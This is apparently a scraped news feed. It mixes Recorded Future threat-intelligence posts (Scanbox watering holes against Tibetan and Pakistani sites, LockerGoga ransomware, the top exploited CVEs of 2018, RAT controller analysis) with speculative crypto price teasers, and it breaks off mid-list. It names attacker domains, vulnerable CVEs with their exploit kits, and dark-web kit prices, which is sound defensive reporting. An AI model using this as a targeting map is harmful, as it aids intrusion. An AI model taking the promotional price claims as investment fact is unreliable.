Insikt Group highlights this activity to enable the protection of targeted communities and to raise awareness of the risks posed by in-memory reconnaissance frameworks, such as Scanbox, used widely by Chinese state-sponsored threat actors, which employ features that enable keylogging and the deployment of additional malware on unsuspecting website visitors.

Key Judgments

  • Analysis of the Tibetan Scanbox deployment highlights several associated domains and IPs revealing a wider campaign of targeting against Tibetan interests.
  • Scanbox has been used previously in the targeting of persecuted minority groups, such as the Uighurs and Tibetans in China.


First noted in early 2014, Scanbox has been used in several high-profile intrusions, including the Anthem breach and the Forbes watering hole attacks, and has been widely adopted by China-based threat actors, including Leviathan (APT40, Temp.Periscope), LuckyMouse (TG-3390, Emissary Panda, Bronze Union), APT10 (menuPass, Stone Panda), and APT3 (Pirpi, Gothic Panda).

Scanbox is a reconnaissance framework that enables attackers to track visitors to compromised websites, performs keylogging, and harvests data that could be used to enable follow-on compromises. It has also been reported to have been modified in order to deliver secondary malware on targeted hosts. Written in Javascript and PHP, Scanbox deployment negates the need for malware to be downloaded onto the host device.

Recorded Future Timeline

Summary of Scanbox use since 2014. (Source: Recorded Future)

Threat Analysis

Pakistan DGIP Scanbox Instance

On March 4, 2019, Insikt Group identified that the online passport application tracking system on Pakistan’s DGIP website ([.]pk) was compromised by attackers who had deployed Scanbox code onto the page. Website visitors were redirected as a result of the strategic web compromise (SWC), also known as watering holes, to an attacker-controlled Scanbox server hosted on Netherlands IP 185.236.76[.]35, enabling the attackers to deploy Scanbox’s wide array of functionality.

Further details about this Scanbox deployment can be found in a recently published blog by Trustwave.


Scanbox-infected webportal for the tracking system on Pakistan’s DGIP.

Central Tibetan Administration Scanbox Instance

Insikt Group researchers were alerted to a new domain registration within the Recorded Future platform that triggered on a typosquatting rule for tibct[.]net. The domain was first registered on March 6, 2019.

Domain Registration Event

New domain registration event noted in the Recorded Future portal and triggering of typosquat risk rule.

When analyzed, the site exhibited content similarities with the legitimate website of the CTA, as shown below:

Spoof Website Comparison

Side-by-side comparison of spoof CTA website tibct[.]net (left), and the legitimate CTA website tibet[.]net (right).

Subsequently, on March 7, 2019, we identified that the tibct[.]net webpage had been modified by the attackers to incorporate malicious JavaScript that redirected visitors to a Scanbox server hosted on oppo[.]ml (load-balanced across Cloudflare IPs 104.18.36[.]192, 104.18.37[.]192, and 2606:4700:30::6812[:]24c0).

Malicious JavaScript

Malicious JavaScript embedded in spoof domain tibct[.]net.

Visitors likely intending to visit the official CTA website, tibet[.]net, were being duped into navigating to tibct[.]net, possibly via links in spearphish emails that were then subsequently redirected to the Scanbox C2 domain oppo[.]ml.

Pivoting from the spoofed domain, tibct[.]net, in WHOIS data revealed that the same email address was used by the attackers to register the domains tibct[.]org (registered March 5, 2019) and monlamlt[.]com (registered March 11, 2019), both of which appear to either host resources relating to Tibet or are typosquats of official CTA domains. Analysis of these domains in Farsight Security’s DNSDB reveal further closely associated infrastructure.

Domain IP Resolution Comment
tibct[.]net 139.59.90[.]169 (March 7 – 8, 2019), 103.255.179[.]142 (March 9, 2019) Domain registered using address located in Guangdong, China; Typosquat of tibet[.]net
tibct[.]org Typosquat of CTA site tibet[.]net
monlamlt[.]com 23.225.161[.]105 Typosquat of monlamit[.]com, a Tibetan IT resources and support site
mailshield[.]ga 23.225.161[.]105 Possible spoof of an AV product
photogram[.]ga 23.225.161[.]105 Possible image sharing spoof (e.g., Instagram)
mail.mailshield[.]ga 23.225.161[.]105 Possible spoof of an AV product


These Scanbox intrusions, which were detected by Insikt Group within a few days of each other, show that the tool is still popular with attackers and is being used against organizations that are broadly aligned with the geopolitical interests of the Chinese state. Based on the identity of the two targeted organizations, as well as the well documented historic use of Scanbox by a variety of Chinese APTs, we assess with low confidence that these Scanbox deployments were likely conducted by Chinese state-sponsored threat actors.

Network Defense Recommendations

Recorded Future recommends organizations implement the following measures when defending against Scanbox targeting as documented in this research:

  • Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
  • Implement the provided Snort rules in the threat hunting package attached in Appendix B into your IDS and IPS appliance and investigate any alerts generated for activity resembling the TTPs outlined in this report.
  • Conduct regular YARA scans across your enterprise for the Scanbox rules listed in the threat hunting package in Appendix B.
  • Recorded Future customers can be alerted to new samples matching the YARA rule currently deployed by Insikt Group researchers within the Recorded Future platform.

To view a full list of the associated indicators of compromise, download the appendix.

The post Scanbox Watering Hole Targets Pakistani and Tibetan Government Website Visitors appeared first on Recorded Future.


Optimize Your Cryptocurrency Portfolio: 7 Altcoin Types You Must Own Before The Surge

Although a rising tide lifts all boats, it may be prudent to consider what type of altcoins you choose for your cryptocurrency portfolio before the next major […]

The post Optimize Your Cryptocurrency Portfolio: 7 Altcoin Types You Must Own Before The Surge appeared first on Hacked: Hacking Finance.

Bitcoin Price Analysis: BTC/USD Quietly Heading for Its Second Consecutive Monthly Gain

Since clawing back above $4,000 last week, bitcoin’s price has entered a stable trading pattern ahead of a key psychological resistance. Despite the lack of momentum observed […]

The post Bitcoin Price Analysis: BTC/USD Quietly Heading for Its Second Consecutive Monthly Gain appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Rebound as Bearish Momentum Fades

The major cryptocurrencies are showing signs of stability today, despite yesterday’s broad-based sell-off, and although the top coins are only sporting modest gains, a sharp downswing has […]

The post Crypto Update: Coins Rebound as Bearish Momentum Fades appeared first on Hacked: Hacking Finance.

Crypto Price Analysis: 5 Altcoins That Show Bullish Continuation

Over the last few months, a good number of altcoins on Binance have managed to post serious gains. These coins popped with a vengeance after being clobbered […]

The post Crypto Price Analysis: 5 Altcoins That Show Bullish Continuation appeared first on Hacked: Hacking Finance.

Binance Coin: BNB Presents Another Opportunity for Interested Buyers

Binance Coin has recently cooled by some 13%, back to a critical near-term area of support, ahead of further leaps north. BNB/USDT presents an opportunity for buying […]

The post Binance Coin: BNB Presents Another Opportunity for Interested Buyers appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: There is Still Opportunity to Grab Some LTC Before it Shoots Back to $100 and Beyond

Litecoin (LTC) price has a minor technical pullback ahead of further potential leaps into the sky. There appear to be just three significant price barriers that are […]

The post Litecoin Price Analysis: There is Still Opportunity to Grab Some LTC Before it Shoots Back to $100 and Beyond appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Trading Around the Bargain Buying Zone

Ripple’s XRP bulls are sleeping within consolidation mode, as price action immensely narrows, ahead of the next fully committed direction. XRP/USD is trading just above a big […]

The post XRP Price Analysis: XRP/USD Trading Around the Bargain Buying Zone appeared first on Hacked: Hacking Finance.

Student Becomes Master as Ontology Overtakes NEO; ONT Price Keeps Climbing

Ontology (ONT) just overtook its former parent chain, NEO (NEO) for the first time ever. Ontology was one of the first tokens to launch on the NEO […]

The post Student Becomes Master as Ontology Overtakes NEO; ONT Price Keeps Climbing appeared first on Hacked: Hacking Finance.

LockerGoga Ransomware Disrupts Operations at Norwegian Aluminum Company

Norwegian aluminum company Norsk Hydro was hit by a ransomware attack on Tuesday, March 19, 2019. According to the Norwegian National Security Authority (NSM), the attackers used LockerGoga, a relatively new strain of ransomware first discovered in January.

According to Reuters, the attack was severe enough to disrupt parts of production at Norsk Hydro. On Tuesday morning, employees were prevented from logging into the network for fear of spreading the ransomware, while the IT staff was attempting cleanup.

Findings from Recorded Future’s Insikt Group indicate that the first known outbreak of LockerGoga was in late January of this year, when it was used against Altran, a French engineering consultancy. During this first campaign, the LockerGoga malicious binary was digitally signed by a previously unknown code signing authority, MIKL LIMITED. The trust for this certificate was revoked following the Altran attack. The new samples relating to the Norsk Hydro attack appear to be signed by ALISA LTD — again, a relatively unknown entity. Trust for this certificate has also now been revoked.

LockerGoga Ransomware Timeline

LockerGoga activity between January 2019 to March 2019.

The LockerGoga ransomware itself is not very sophisticated, according to analysis published by Bleeping Computer. Deployment of the ransomware is manual, with the attackers behind LockerGoga most likely using Active Directory to spread the ransomware. Initial infection into Norsk Hydro is suspected to be via a phishing campaign, but that has not been confirmed as of this writing. At this time there is no decryption tool for LockerGoga. The cure for LockerGoga at this point appears to be good protection against phishing attacks, and keeping antivirus and other endpoint protections up to date.

Once inside a target network, the team behind LockerGoga is using techniques similar to the attackers behind Ryuk, CrySIS, SamSam, and other recent successful ransomware campaigns: deploying the ransomware in multiple places on the target network to disrupt operations, cause the most damage, and force the targeted organization to pay the ransom — although the skillset of the LockerGoga team seems to be more shallow than similar teams.

However, the team at Norsk Hydro has stated they will not pay the ransom; instead, they are restoring systems from backup.

These types of disruptive attacks are becoming more common, with the most famous one being the SamSam attack on Atlanta last year. Recent attacks on the Boston Public Defender’s Office, Orange County in North Carolina, and shipping company COSCO have all had a disruptive effect on services.

There are a million reasons not to pay the ransom in these types of attacks. Paying the ransom only helps the criminals to produce better malware, and like a bad romance, it may encourage them (or other attackers) to strike a target again, knowing that they are likely to pay the ransom. This happened with the Colorado Department of Transportation in 2018.

The costs to restore dozens or hundreds of systems are enormous, however, and that doesn’t take into account all of the associated incident response costs. From a cost perspective, it may make more sense to pay the ransom. One word of caution with regard to LockerGoga: this particular ransomware also encrypts DLL files. There have been cases with other ransomware families where trying to decrypt systems that contain encrypted DLL files fails. This means organizations have paid the ransom and still didn’t have access to their files.

Click here to download the associated indicators of compromise.

Click here to download the associated Yara rules.

The post LockerGoga Ransomware Disrupts Operations at Norwegian Aluminum Company appeared first on Recorded Future.


Crypto Price Analysis: NEM and Ethereum Classic Ripe for Bottom Picking

Legendary investor Baron Rothschild once said, “the time to buy is when there’s blood in the streets.” While this quote may not make sense to new traders, […]

The post Crypto Price Analysis: NEM and Ethereum Classic Ripe for Bottom Picking appeared first on Hacked: Hacking Finance.

Bitcoin Cash Price Analysis: U.S. Electronics Giant Avnet to Accept BCH; Price Action has Cooled but Subject to Further Buying Pressure

Nasdaq listed electronics giant Avnet is set to start accepting Bitcoin Cash and Bitcoin as a method of payment.  BCH/USD price is consolidating after a decent push […]

The post Bitcoin Cash Price Analysis: U.S. Electronics Giant Avnet to Accept BCH; Price Action has Cooled but Subject to Further Buying Pressure appeared first on Hacked: Hacking Finance.

Cardano’s Run North Continues as CoinMarketCap Gives ADA an ‘A’ Grade

After a brief pause, Cardano (ADA) continued higher Wednesday following a successful mainnet upgrade and positive speculation linking the cryptocurrency to a potential Coinbase listing. A solid […]

The post Cardano’s Run North Continues as CoinMarketCap Gives ADA an ‘A’ Grade appeared first on Hacked: Hacking Finance.

Rise of the Small-Caps: Tezos, Zcash, VeChain Surge as Majors Stagnate

As the top cryptocurrencies stagnated Wednesday, a group of prominent small caps put up big gains through the morning session, once again highlighting the ‘decoupling effect’ between […]

The post Rise of the Small-Caps: Tezos, Zcash, VeChain Surge as Majors Stagnate appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Core Developers Eye ASIC-Resistant Algorithm ProgPoW Integration

The Ethereum core developer team discussed in their most recent meeting the integration of an ASIC-resistant algorithm, ProgPoW. ETH/USD price action is within consolidation mode; a formation […]

The post Ethereum Price Analysis: Core Developers Eye ASIC-Resistant Algorithm ProgPoW Integration appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: Faster and More Energy Efficient ZEC Miner Released by Bitmain

The mining giant, Bitmain, launched a newly upgraded miner for Zcash (ZEC). It is said to be three times more efficient. ZEC/USD bulls are enjoying a rally […]

The post Zcash Price Analysis: Faster and More Energy Efficient ZEC Miner Released by Bitmain appeared first on Hacked: Hacking Finance.

Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018

Click here to download the complete analysis as a PDF.

This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report, and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.

Executive Summary

Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to shed light on this by determining the top 10 vulnerabilities from 2018. It is imperative that security professionals have insight into those vulnerabilities that impact a company’s technology stack and are included in exploit kits, used to distribute a remote access trojan (RAT), or are currently being used in phishing attacks.

In 2018, we observed more exploits targeting Microsoft products than Adobe ones. Eight out of 10 vulnerabilities exploited via phishing attacks, exploit kits, or RATs targeted Microsoft products, and only one Adobe Flash vulnerability made the top 10, likely due to a combination of better patching and Flash Player’s impending demise in 2020.

Like in past years, the development of new exploit kits has continued to drop amid the shift to more targeted attacks and less availability of zero-day vulnerabilities. Exploit kits in previous years took advantage of Adobe product vulnerabilities, which have continued to dwindle.

Key Judgments

  • For the second year in a row, Microsoft was consistently targeted the most, with eight of the top 10 vulnerabilities impacting its products. In 2017, seven of the top 10 vulnerabilities also affected Microsoft. Conversely, the majority of 2016 and 2015’s top vulnerabilities targeted Adobe Flash Player.
  • Like 2017’s report, only a few vulnerabilities from past reports remained in the top exploited vulnerabilities. CVE-2017-0199, last year’s top exploited vulnerability, which impacted Microsoft Office, moved to fifth place, with its continued inclusion in the ThreadKit exploit kit. CVE-2016-0189, the top vulnerability in 2016 and ranked second in 2017, was still associated with five different exploit kits. On average, vulnerabilities have an average life expectancy of nearly seven years, per a 2017 RAND report.
  • The number of new exploit kits continued to drop in 2018 by 50 percent, with only five new exploit kits, compared to 10 the year before. Two of these exploit kits were associated with 2018’s top exploited vulnerabilities: Fallout and LCG Kit. As in previous years, similar trends continue to impact the downward trend of exploit kits, including shifts to more secure browsers and specific victim targeting.
  • With this year’s inclusion of RATs, 35 new RATs were released in 2018, versus 47 in 2017. Only one of these new RATs, Sisfader, was associated with a top vulnerability: CVE-2017-8750, a Microsoft Office exploit.
  • One exploit kit, ThreadKit, stood out for its number of references on the dark web compared to other exploit kits. As of December 31, 2018, ThreadKit contained four of the top 10 vulnerabilities and was last selling on the dark web for $400.
Cyber Vulnerability References Company
CVE-2018-8174 567 Microsoft
CVE-2018-4878 387 Adobe
CVE-2017-11882 223 Microsoft
CVE-2017-8750 192 Microsoft
CVE-2017-0199 91 Microsoft
CVE-2016-0189 78 Microsoft
CVE-2017-8570 68 Microsoft
CVE-2018-8373 66 Microsoft
CVE-2012-0158 55 Microsoft
CVE-2015-1805 49 Google Android


Recorded Future continued to expand the breadth of its annual list of top 10 vulnerabilities by adding RATs, in addition to co-occurrence with exploits or phishing attacks, which were added in 2017. Like other years, the goal of this list is to highlight the vulnerabilities most exploited by the criminal underground. While the leak of nation state-related exploits made headlines in 2018, Recorded Future did not see evidence that these exploits were highly used by the criminal underground and thus are not a focus in this analysis.

The list continued to analyze occurrences of vulnerabilities with exploit kits, as done in the past three years’ reports. Since the emergence of exploit kits in 2006, cybercriminals require less coding experience to take advantage of this straightforward crimeware-as-a-service channel.

The inclusion of RATs provides an additional malware category to determine which vulnerabilities were the most frequent in 2018. RATs have been a mainstay for cybercriminals, as they can provide the attacker with complete control over a victim’s computer.

Methodology and Sources

Recorded Future utilized a list of 167 exploit kits as one of the parameters to determine the top referenced and exploited vulnerabilities of 2018. Only five new exploit kits were created in 2018, compared to 10 in 2017.

Exploit Kit Category

Exploit kit category in Recorded Future containing dozens of exploits.

This year’s report also included RATs when determining the top exploited vulnerabilities. Recorded Future used its repository of 492 RATs. RATs were added in part because of the increase in their usage due to their role as a multipurpose malware.

RAT Malware Category

RAT malware category in Recorded Future.

A few vulnerabilities were not included in the top 10 due to adoption by nation-state actors as opposed to use by the criminal underground: ETERNALBLUE and Spectre/Meltdown. The ETERNALBLUE exploit (which used MS17-010), while often mentioned, was not used by the criminal underground or offered for sale as a part of other exploit kits. Spectre, while noted in a few phishing attacks, was also not heavily used by cybercriminals. One possible reason why is that these exploits are more sophisticated and difficult to use versus typical exploit kits, which were once prolific due to their ease of use. However, as shown by Recorded Future’s previous research on top vulnerabilities, the emergence of new exploit kits continues to decrease.

As this annual list is based off metadata analysis of available information from open, deep, and dark web sources, Recorded Future did not reverse-engineer any malware mentioned in this piece. Instead, the aim of this report is to showcase the most exploited vulnerabilities.

Last Year’s Top Exploited Vulnerabilities

The top exploited vulnerability on the list, CVE-2018-8174, a Microsoft Internet Explorer vulnerability nicknamed “Double Kill,” was included in four exploit kits (RIG, Fallout, KaiXin, and Magnitude). Exploit kits associated with this vulnerability were noted to spread the malware Trickbot through phishing attacks. The Magnitude exploit kit delivered Magniber ransomware, which primarily targeted users in Asia where computer default languages were in Korean, Chinese, or Malay.

CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year’s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016’s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below.

Fallout Exploit Kit

Last price update for the Fallout exploit kit by FalloutEK.

For the first time, a vulnerability has made the top 10 vulnerability list three years in a row — CVE-2016-0189. Why has this vulnerability persisted? For starters, CVE-2016-0189 is not dependent on one version of Internet Explorer (it impacts IE 9 through 11), resulting in a more reliable vulnerability to exploit. Because of this versatility, the vulnerability has been successfully incorporated into a variety of various exploit kits over the years, as many as five in 2018 (Underminer, Magnitude, Grandsoft, KaiXin, and RIG). Additionally, there are no mitigating factors available to prevent CVE-2016-0189 — the only workarounds are restricting access to two common dynamic-linked library files: VBScript.dll and JScript.dll.

Two vulnerabilities were associated with numerous pieces of malware: CVE-2017-11882 and CVE-2017-0199. These vulnerabilities were associated with 10 and eight pieces of malware, respectively. Both were used in Trillium’s Security Multisploit Tool, which included four of the top 10 vulnerabilities. This tool was heavily discussed and advertised on Hack Forums and Nulled Forum, and received positive reviews. CVE-2017-0199 was notably used by Gorgon Group, a threat group operating out of Pakistan which targeted government organizations in the U.K. and United States, among others, through targeted spearphishing attacks.

Trillium Security Multisplit Tool Post

Post on Trillium’s Security Multisplit Tool as seen on numerous dark web forums.

Cyber Vulnerability Malware Count
CVE-2018-8174 7
CVE-2018-4878 4
CVE-2017-11882 10
CVE-2017-8750 4
CVE-2017-0199 8
CVE-2016-0189 5
CVE-2017-8570 4
CVE-2018-8373 1
CVE-2012-0158 1
CVE-2015-1805 1
Cyber Vulnerability Company Product Associated Malware CVSS Recorded Future Risk Score
CVE-2018-8174 Microsoft Internet Explorer Fallout Exploit Kit, KaiXin Exploit Kit, LCG Kit Exploit Kit, Magnitude Exploit Kit, RIG Exploit Kit, Trickbot, Underminer Exploit Kit 7.6 89
CVE-2018-4878 Adobe Flash Player Fallout Exploit Kit, GreenFlash Exploit Kit, Hermes Ransomware, Sundown Exploit Kit, Threadkit Exploit Kit 7.5 89
CVE-2017-11882 Microsoft Office AgentTesla, Andromeda, BONDUPDATER, HAWKEYE, LCG Kit, Loki, POWRUNNER, QuasarRAT, REMCOS RAT, ThreadKit Exploit Kit 9.3 99
CVE-2017-8750 Microsoft Office Formbook, Loki, QuasarRAT 7.6 89
CVE-2017-0199 Microsoft Office DMShell++, njRAT, Pony, QuasarRAT, REMCOS RAT, SHUTTERSPEED, Silent Doc Exploit Kit, Threadkit Exploit Kit 9.3 99
CVE-2016-0189 Microsoft Internet Explorer Grandsoft Exploit Kit, KaiXin Exploit Kit, Magnitude Exploit Kit, RIG Exploit Kit, Underminer Exploit Kit 7.6 89
CVE-2017-8570 Microsoft Office Formbook, QuasarRAT, Sisfader RAT, Threadkit Exploit Kit, Trickbot 9.3 99
CVE-2018-8373 Microsoft Internet Explorer Quasar RAT 7.6 89
CVE-2012-0158 Microsoft Office Silent Doc Exploit, PlugX 9.3 89
CVE-2015-1805 Google Android AndroRAT 7.2 89

Development of Exploit Kits Continues to Decrease

As observed in prior reports, the development of new exploit kits continued to decrease. Only five new exploit kits emerged in 2018, compared with 10 in 2017, and 62 in 2016. Of those five, two were associated with a top 10 vulnerability: Fallout and LCG Kit. Starting in March, LCG Kit incorporated CVE-2017-11882, but later that year also incorporated 2018’s top vulnerability, CVE 2018-8174. Although LCG Kit has been associated with a number of malicious attachments, including the spreading of RATs such as REMCOS and QuasarRAT, there were no direct references to this exploit kit for sale on the dark web in 2018 using the LCG Kit name. New exploit kits developed in 2018 include:

  • Best Pack Exploit Kit
  • Creep Exploit Kit
  • Darknet Angler
  • Fallout Exploit Kit
  • LCG Kit

Exploit Kits That Continued to Make Their Mark

Among exploit kits associated with the top vulnerabilities, ThreadKit was the most discussed on dark web sources in 2018. ThreadKit incorporated four of the top 10 vulnerabilities (CVE-2018-4878, CVE-2017-11882, CVE-2017-0199, and CVE-2017-8570). ThreadKit’s notoriety increased when the Cobalt Hacking Group (or Cobalt Group) added another stage to the macro exploit by including its signature CobInt trojan. The group typically attacks financial institutions, although the group’s activity has lessened due to the arrests of some of its members.

Dark Web Discussion

Dark web discussion of exploits associated with 2018’s top vulnerabilities.

In 2018, ThreadKit was last updated on December 28 by mrbass, a user on a dark web forum, to include vulnerability CVE-2018-15982 (a more recent Adobe zero-day vulnerability), which continued to be sold for $400, as seen below.

ThreadKit Exploit Kit Update

ThreadKit Exploit Kit Update

Last update in 2018 for the ThreadKit exploit kit by mrbass on a dark web forum.

UnderMiner, which exploited two of 2018’s top vulnerabilities — CVE-2016-0189 and CVE-2018-4878 — made a resurgence in the latter part of 2018. Like ThreadKit, UnderMiner took advantage of, and was the first to exploit, the zero-day vulnerability CVE-2018-15982 in late December 2018.

RATs in Focus

Sisfader is the only RAT that first emerged in 2018 and was associated with a top vulnerability, with its exploit of CVE-2017-8570. The RAT maintains persistence by installing itself as a service when launched from malicious RTF files. According to available sources, there was no evidence of Sisfader for sale.

RATs Cyber Vulnerability Count
QuasarRAT 5
njRAT 1
PlugX 1
AndroRAT 1

QuasarRAT was associated with the most vulnerabilities, including, most notably, those in Trillium’s Security Multisploit Tool. This RAT, which has been active since 2011, continues to show its viability in a variety of attacks, including spearphishing attacks on government organizations.

Outlook and Recommended Actions

Official vulnerability databases, and even scanning tools, cannot arm organizations with one key metric: the overlap between the vulnerabilities in the systems you use and the ones that are being actively exploited by threat actors. The goal of this annual list is to provide an account of the most widely adopted vulnerability exploits, in addition to some recommended actions:

  • Prioritize patching of all the vulnerabilities identified in this post.
  • Do not forget to patch older vulnerabilities — the average vulnerability stays alive for nearly seven years.
  • Remove the affected software if it does not impact key business processes.
  • Consider Google Chrome as a primary browser.
  • While Flash Player is going away and more sites increasing have removed this technology from its site, continue to heed caution with websites that don’t.
  • Utilize browser ad-blockers to prevent exploitation via malvertising.
  • Frequently back up systems, particularly those with shared files, which are regular ransomware targets.
  • Users and organizations should conduct or maintain phishing security awareness to mitigate attacks.
  • Companies should deliver user training to encourage skepticism of emails requesting additional information or prompting clicks on any links or attachments. Companies will not generally ask customers for personal or financial data, but when in doubt, contact the company directly by phone and confirm if they actually need the information.

The post Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 appeared first on Recorded Future.


Monero Price Analysis: Despite Greater Support, XMR Price is Struggling to Break Free

XMR/USD has been stuck trading within the confinements of a horizontal wedge pattern formation since early December 2018. Trezor, the crypto-security hard wallet provider, announced its upcoming […]

The post Monero Price Analysis: Despite Greater Support, XMR Price is Struggling to Break Free appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Jumps 10% as IBM Launches Stellar-Powered World Wire Platform

XLM/USD late on Monday was holding double-digit gains, as the price broke down a significant barrier of resistance. Information technology giant IBM has launched the World Wire […]

The post Stellar Price Analysis: XLM/USD Jumps 10% as IBM Launches Stellar-Powered World Wire Platform appeared first on Hacked: Hacking Finance.

Dash Price Analysis: The Technology and Its Cryptocurrency that Keeps Bringing Real-Word Value Use Cases

Dash Text launched a new service initially piloting in Venezuela for donation payment in DASH without the requirement of the internet. DASH/USDT has a significant barrier ahead […]

The post Dash Price Analysis: The Technology and Its Cryptocurrency that Keeps Bringing Real-Word Value Use Cases appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRX/USD Heading for a Big Bullish Retest after Escaping Descending Wedge Pattern

The Tron (TRX) price is cooling, with eyes on a retest of a breached wedge pattern structure. TRX/USD could see very fast return to the $0.030000 price […]

The post Tron Price Analysis: TRX/USD Heading for a Big Bullish Retest after Escaping Descending Wedge Pattern appeared first on Hacked: Hacking Finance.

IOTA Runs Into Familiar Resistance but Outlook Brightens on Geo-Tag Transaction Proposal

IOTA (MIOTA) ran into familiar resistance on Sunday, as the bulls failed to break through a known area of supply that has thwarted the last two major […]

The post IOTA Runs Into Familiar Resistance but Outlook Brightens on Geo-Tag Transaction Proposal appeared first on Hacked: Hacking Finance.

The Satoshis Have Aligned: Historical Crypto Chart Suggests Bitcoin Has Already Bottomed

Nobody really needs to be told that the general sentiment surrounding the cryptocurrency market right now is very much of the bullish persuasion. Now bear in mind […]

The post The Satoshis Have Aligned: Historical Crypto Chart Suggests Bitcoin Has Already Bottomed appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD is Free to Run Wild Following Triangular Structure Escape

XRP/USD is running at two sessions in the green, as the bulls escape from a triangular pattern structure. The supply zone is tracking from the $0.3300-$0.3500 price […]

The post XRP Price Analysis: XRP/USD is Free to Run Wild Following Triangular Structure Escape appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: Bulls Enjoy Explosive Breakout as Hoskinson Teases ADA-Supported Ledger Wallet

The Cardano (ADA/USDT) price is elevated thanks to another wave of buying pressure out from a bullish pennant pattern. Cardano’s community has much to be excited about […]

The post Cardano Price Analysis: Bulls Enjoy Explosive Breakout as Hoskinson Teases ADA-Supported Ledger Wallet appeared first on Hacked: Hacking Finance.

NEM Price Analysis: The Foundation and XEM are on a Strong Road to Recovery

NEM (XEM/USDT) has jumped a chunky 18% over the last four sessions of consecutive gains. The NEM community is very much optimistic about the organization’s restricting plan. […]

The post NEM Price Analysis: The Foundation and XEM are on a Strong Road to Recovery appeared first on Hacked: Hacking Finance.

Talking to RATs: Assessing Corporate Risk by Analyzing Remote Access Trojan Infections

Insikt Group

Click here to download the complete analysis as a PDF.

Recorded Future analyzed network communications relating to a selection of RAT command-and-control servers across several malware families in order to profile targeted victim organizations and sectors. This report is based on data sourced from the Recorded FutureⓇ Platform, VirusTotal, Farsight DNS, Shodan, GreyNoise, and other OSINT techniques.

This report will be of most value to network defenders and corporate risk professionals within companies concerned about the risk posed by their third-party supply chain. To learn more about how to leverage Recorded Future for monitoring and investigating third-party risk, read about our new Third-Party Risk offering. This assessment takes advantage of the data behind our new network traffic analysis risk rules for third-party risk to generate actionable insights.

Executive Summary

Remote access trojans (RATs) on a corporate system may serve as a key pivot point to access information laterally within an enterprise network. By analyzing network metadata, Recorded Future analysts were able to identify RAT command-and-control (C2) servers, and more crucially, which corporate networks were communicating to those controllers. This approach allows Recorded Future to provide insight about third-party organizations that our clients may rely upon, enabling a better understanding of potential third-party risk to their own data.

Insikt Group used the joint Recorded Future and Shodan Malware Hunter project and the Recorded Future Platform to identify active malware controllers for 14 malware families between December 2, 2018 and January 9, 2019. We then focused our analysis on a subset of malware — Emotet, Xtreme RAT, and ZeroAccess — to profile RAT communications from third-party organizations to the controllers.

Key Judgments

  • The majority of Emotet controllers resolved to IPs in Latin American countries.
  • A significant proportion of infected Emotet hosts were based in Latin America, corroborating community observations of a surge in late-2018 Emotet activity targeting South American entities. Infected hosts include organizations in the automotive, finance, energy, construction, retail and entertainment, logistics, and technology sectors.
  • Infected Xtreme RAT hosts were identified within:
    • A video game company and a utilities company in Europe
    • Middle Eastern, South Asian, and East Asian telecommunications companies
    • An industrial conglomerate and an IT company in East Asia



Public and private organizations all over the world continue to experience digital intrusions with news of large breaches being almost a daily occurrence. In their 2018 annual review, the U.K’s NCSC reported that they had directly handled 557 incidents between September 1, 2017 and August 31, 2018 highlighting the scale of the problem just in the U.K.

Often, attacks utilize RATs, which enable attackers to illicitly gain control of a host device. RATs are a feature-rich software generally used by adversaries to conduct activity such as keylogging, file extraction, recording host audio and video, and more.

A significant proportion of these attacks are carried out using commodity RATs, such as DarkTrack RAT, Xtreme RAT, or ZeroAccess, with attacker motivations ranging from financial gain to gaining credibility within hacking communities. Many hacking forum administrators will stipulate that new members provide evidence of their “ability” in order to be accepted into the forum, so the relatively low-level technical knowledge required to use commodity RATs, along with extensive online documentation, makes them a highly attractive proposition for inexperienced hackers.

At the other end of the spectrum are state-backed advanced persistent threat (APTs) groups and advanced criminal groups who may conduct malware campaigns with greater sophistication in order to achieve their operational outcomes. APTs continue to use RATs because they are easy to configure, modify, and use. This combined with their relative effectiveness against antivirus software and the potential for hindering attribution by “hiding in the noise” ensures RATs continue to be used by APTs and cybercriminals.

Cybercriminals have often been forced to innovate in developing tooling and malware to support their usually financially motivated objectives. As RATs and other malware used by cybercriminals are disrupted by law enforcement action or their methods are neutered by coordinated industry initiatives, a change in methodology or even business model is sometimes forced. This has been the case with the actors behind Emotet.

Emotet has evolved from a banking trojan targeting European banking customers to a modularized malware deployment platform with several high-profile campaigns noted in 2018. Emotet, as a self-propagating trojan, is a particularly virulent piece of malware that exhibits network worm-like characteristics, enabling it to build up a considerable botnet of infected victims.

Analytic Approach

Recorded Future researchers identified a variety of RAT and Emotet controllers derived from threat lists in the Recorded Future platform and used network metadata to identify victim communications with the RAT C2 IPs. The threat lists included data from:

  1. Recorded Future’s jointly-developed Malware Hunter1 capability with Shodan
  2. The Feodo malware family (also known as Dridex or Emotet/Heodo) blocklist

Editor’s Note: Due to technological limitations of the collection mechanism, the number of C2s identified using Malware Hunter is not reflective of the true number of C2s present globally for each analyzed malware family in this research. Therefore, this analysis is focused on the methodology of identifying infected clients using Recorded Future to inform third-party risk.

For the purposes of our research, we searched for active controllers in the December 2, 2018 to January 8, 2019 time frame for the following malware families:

  • Bozok RAT
  • Nanocore
  • PoisonIvy
